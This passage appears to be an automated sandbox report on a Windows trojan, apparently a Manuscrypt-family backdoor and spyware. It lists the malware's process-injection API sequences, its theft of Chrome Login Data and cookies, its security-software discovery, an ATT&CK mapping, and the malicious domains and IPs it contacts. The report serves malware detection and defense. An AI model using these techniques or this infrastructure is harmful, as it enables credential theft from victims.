      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2B667950000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 12DBC450000Jump to behavior
      Source: C:\Windows\System32\svchost.exeThread register set: target process: 5192Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04269000 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,10_2_04269000
      Source: C:\Windows\System32\svchost.exeThread register set: 5192 4D000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04262090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,10_2_04262090
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -hJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspServiceJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04262090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,10_2_04262090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,10_2_0425AE60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,10_2_0425AE60
      Source: svchost.exe, 0000000D.00000002.795536674.00000042989FF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0040A125
      Source: C:\Users\user\Desktop\file.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0040A6FE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408440 cpuid 0_2_00408440
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C70 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00405C70
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040203F GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,0_2_0040203F
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
      Source: svchost.exe, 00000025.00000000.430080546.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.dbJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies.dbJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04273DA0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,10_2_04273DA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0426DB70 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,10_2_0426DB70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042723F0 socket,bind,closesocket,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,10_2_042723F0
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      1
      Valid Accounts
      111
      Windows Management Instrumentation
      1
      Create Account
      1
      Valid Accounts
      1
      Disable or Modify Tools
      1
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts2
      Native API
      1
      Valid Accounts
      11
      Access Token Manipulation
      1
      Deobfuscate/Decode Files or Information
      1
      Network Sniffing
      1
      System Service Discovery
      Remote Desktop Protocol1
      Man in the Browser
      Exfiltration Over Bluetooth11
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts12
      Service Execution
      11
      Windows Service
      11
      Windows Service
      2
      Obfuscated Files or Information
      11
      Input Capture
      3
      File and Directory Discovery
      SMB/Windows Admin Shares1
      Data from Local System
      Automated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)1
      Bootkit
      812
      Process Injection
      1
      Install Root Certificate
      NTDS1
      Network Sniffing
      Distributed Component Object Model11
      Input Capture
      Scheduled Transfer14
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets37
      System Information Discovery
      SSH2
      Clipboard Data
      Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Masquerading
      Cached Domain Credentials471
      Security Software Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Valid Accounts
      DCSync12
      Virtualization/Sandbox Evasion
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Modify Registry
      Proc Filesystem3
      Process Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
      Virtualization/Sandbox Evasion
      /etc/passwd and /etc/shadow1
      Application Window Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
      Access Token Manipulation
      Network Sniffing1
      Remote System Discovery
      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron812
      Process Injection
      Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
      Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
      Bootkit
      KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task1
      Rundll32
      GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
      Trusted RelationshipPythonHypervisorProcess Injection1
      Indicator Removal on Host
      Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 696397 Sample: file.exe Startdate: 02/09/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 2 other signatures 2->58 8 rundll32.exe 2->8         started        10 file.exe 2 2->10         started        process3 signatures4 13 rundll32.exe 3 8->13         started        76 Creates processes via WMI 10->76 16 file.exe 3 10->16         started        20 conhost.exe 10->20         started        process5 dnsIp6 78 Contains functionality to infect the boot sector 13->78 80 Contains functionality to inject threads in other processes 13->80 82 Contains functionality to inject code into remote processes 13->82 84 5 other signatures 13->84 22 svchost.exe 1 13->22 injected 25 svchost.exe 13->25 injected 27 svchost.exe 13->27 injected 31 15 other processes 13->31 44 v.xyzgamev.com 104.21.40.196, 443, 49753, 49754 CLOUDFLARENETUS United States 16->44 38 C:\Users\user\AppData\Local\Temp\db.dll, PE32 16->38 dropped 29 conhost.exe 16->29         started        file7 signatures8 process9 signatures10 68 System process connects to network (likely due to code injection or exploit) 22->68 70 Sets debug register (to hijack the execution of another thread) 22->70 72 Modifies the context of a thread in another process (thread injection) 22->72 74 Creates processes via WMI 22->74 33 svchost.exe 12 14 22->33         started        process11 dnsIp12 46 g.agametog.com 34.142.181.181 ATGS-MMD-ASUS United States 33->46 48 208.95.112.1 TUT-ASUS United States 33->48 50 104.21.34.132 CLOUDFLARENETUS United States 33->50 40 C:\Users\user\AppData\Local\...\Cookies.db, SQLite 33->40 dropped 42 C:\Users\user\AppData\Local\...\Login Data.db, SQLite 33->42 dropped 60 Query firmware table information (likely to detect VMs) 33->60 62 Installs new ROOT certificates 33->62 64 Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically) 33->64 66 Tries to harvest and steal browser information (history, passwords, etc) 33->66 file13 signatures14

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.exe5%ReversingLabsWin32.Backdoor.Manuscrypt
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      24.0.svchost.exe.2468b5b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      34.0.svchost.exe.1af63d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      26.0.svchost.exe.226f8d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      30.0.svchost.exe.21bd8470000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      29.2.svchost.exe.236f3940000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      35.0.svchost.exe.23e495b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      27.0.svchost.exe.195990b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      29.0.svchost.exe.236f3940000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      24.2.svchost.exe.2468b5b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      15.2.svchost.exe.1b37c560000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      41.0.svchost.exe.2b6680f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      30.2.svchost.exe.21bd8470000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      22.0.svchost.exe.1b6d6000000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      20.0.svchost.exe.1dbfc920000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      41.2.svchost.exe.2b6680f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      37.0.svchost.exe.28291080000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      37.2.svchost.exe.28291080000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      35.2.svchost.exe.23e495b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      36.2.svchost.exe.1dd8fdb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      36.0.svchost.exe.1dd8fdb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      10.2.rundll32.exe.4250000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      33.0.svchost.exe.1e554740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      13.2.svchost.exe.1a748340000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      21.0.svchost.exe.1f97f120000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      22.2.svchost.exe.1b6d6000000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      34.2.svchost.exe.1af63d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      20.2.svchost.exe.1dbfc920000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      26.2.svchost.exe.226f8d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      31.2.svchost.exe.1f1ed200000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      27.2.svchost.exe.195990b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      11.0.svchost.exe.22baf530000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      25.0.svchost.exe.25139800000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      33.2.svchost.exe.1e554740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      15.0.svchost.exe.1b37c560000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      21.2.svchost.exe.1f97f120000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      11.2.svchost.exe.22baf530000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      25.2.svchost.exe.25139800000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      31.0.svchost.exe.1f1ed200000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
      SourceDetectionScannerLabelLink
      v.xyzgamev.com12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://v.xyzgamev.com/911.html14%VirustotalBrowse
      https:///xboxlive.com0%Avira URL Cloudsafe
      https://pp.abcgameabc.com/api4.php000%Avira URL Cloudsafe
      https://pp.abcgameabc.com/api4.phpa0%Avira URL Cloudsafe
      http://crl.ver)0%Avira URL Cloudsafe
      https://login.windows.net2-10020%Avira URL Cloudsafe
      https://v.xyzgamev.com/logo.png100%Avira URL Cloudmalware
      https://v.xyzgamev.com/911.html100%Avira URL Cloudmalware
      https://pp.abcgameabc.com/0%Avira URL Cloudsafe
      http://35.236.159.79/win.pacAutoConfigURLSOFTWARE100%Avira URL Cloudmalware
      https://pp.abcgameabc.com/api4.phpJ0%Avira URL Cloudsafe
      https://login.windows.net12DF70%Avira URL Cloudsafe
      https:///live.com0%Avira URL Cloudsafe
      https://pp.abcgameabc.com/api4.php0%Avira URL Cloudsafe
      https://pp.abcgameabc.com/api4.phpH0%Avira URL Cloudsafe
      https://login.windows.netory0%Avira URL Cloudsafe
      https:///windows.net0%Avira URL Cloudsafe
      http://35.236.159.79/win.pac100%Avira URL Cloudmalware
      https://pp.abcgameabc.com/api4.phpy0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      v.xyzgamev.com
      104.21.40.196
      truefalseunknown
      g.agametog.com
      34.142.181.181
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://v.xyzgamev.com/911.htmltrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://v.xyzgamev.com/logo.pngtrue
        • Avira URL Cloud: malware
        unknown
        https://pp.abcgameabc.com/api4.phpfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://35.236.159.79/win.pacAutoConfigURLSOFTWAREsvchost.exe, 0000000D.00000002.812594794.000001A749F50000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https:///xboxlive.comsvchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        https://pp.abcgameabc.com/api4.php00svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.google.com/Psvchost.exe, 00000016.00000000.318726025.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.321015591.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.798257881.000001B6D541F000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          https://xsts.auth.xboxlive.comsvchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399702909.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp.svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://pp.abcgameabc.com/svchost.exe, 0000000D.00000003.450892178.000001A74A3BC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.ver)svchost.exe, 0000000F.00000000.293150967.000001B37C213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.305697056.000001B37C213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.535579714.000001B37C213000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://pp.abcgameabc.com/api4.phpasvchost.exe, 0000000D.00000002.814815021.000001A74A35A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://login.windows.net2-1002svchost.exe, 00000023.00000002.798887868.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.397092463.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399702909.0000023E48858000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://login.windows.net12DF7svchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https:///live.comsvchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://pp.abcgameabc.com/api4.phpJsvchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://login.windows.net/svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://pp.abcgameabc.com/api4.phpHsvchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.windows.netorysvchost.exe, 00000023.00000000.397194386.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.799744183.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ip-api.com/json/?fields=8198svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.804222562.000001A7480E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https:///windows.netsvchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://35.236.159.79/win.pacsvchost.exe, 0000000D.00000002.812594794.000001A749F50000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://pp.abcgameabc.com/api4.phpysvchost.exe, 0000000D.00000002.801106382.000001A748074000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.instagram.com/accounts/edit/svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://login.windows.net/2DF7svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://xsts.auth.xboxlive.com/svchost.exe, 00000023.00000000.399779655.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.21.34.132
                        unknownUnited States
                        13335CLOUDFLARENETUSfalse
                        208.95.112.1
                        unknownUnited States
                        53334TUT-ASUSfalse
                        104.21.40.196
                        v.xyzgamev.comUnited States
                        13335CLOUDFLARENETUSfalse
                        34.142.181.181
                        g.agametog.comUnited States
                        2686ATGS-MMD-ASUStrue
                        Joe Sandbox Version:35.0.0 Citrine
                        Analysis ID:696397
                        Start date and time:2022-09-02 11:01:26 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 13m 29s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:file.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:18
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.bank.troj.spyw.evad.winEXE@10/5@4/4
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 58.6% (good quality ratio 54%)
                        • Quality average: 72.3%
                        • Quality standard deviation: 31%
                        HCA Information:
                        • Successful, ratio: 97%
                        • Number of executed functions: 22
                        • Number of non-executed functions: 253
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 23.50.105.163
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        11:02:36API Interceptor4x Sleep call for process: file.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        104.21.34.132R2axoid4If.exeGet hashmaliciousBrowse
                          x9rKinpIYb.exeGet hashmaliciousBrowse
                            RSg2UWbVWV.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                LBPv87JqjI.exeGet hashmaliciousBrowse
                                  AHy2heusTp.exeGet hashmaliciousBrowse
                                    72JrEIo9FX.exeGet hashmaliciousBrowse
                                      mLtELLXIJs.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.W32.Mokes.G.genEldorado.9275.exeGet hashmaliciousBrowse
                                          SecuriteInfo.com.W32.Mokes.G.genEldorado.4480.exeGet hashmaliciousBrowse
                                            k2PpV0RYpk.exeGet hashmaliciousBrowse
                                              Duo2PmRglS.exeGet hashmaliciousBrowse
                                                RPz3lObFvu.exeGet hashmaliciousBrowse
                                                  rPYoKSaOOP.exeGet hashmaliciousBrowse
                                                    208.95.112.1QqU4yi6bv8.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exeGet hashmaliciousBrowse
                                                    • ip-api.com/line/?fields=countryCode
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    BF9714F60C2B4B43CC0383B3155D9C737271916032051.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    NoCry.bin.exeGet hashmaliciousBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    OSGpNfwWMh.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    BpG12M3con.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    file.exeGet hashmaliciousBrowse
                                                    • ip-api.com/json/
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    v.xyzgamev.comfile.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    BpG12M3con.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    file.exeGet hashmaliciousBrowse
                                                    • 172.67.188.70
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
                                                    • 104.21.40.196
                                                    file.exeGet hashmaliciousBrowse
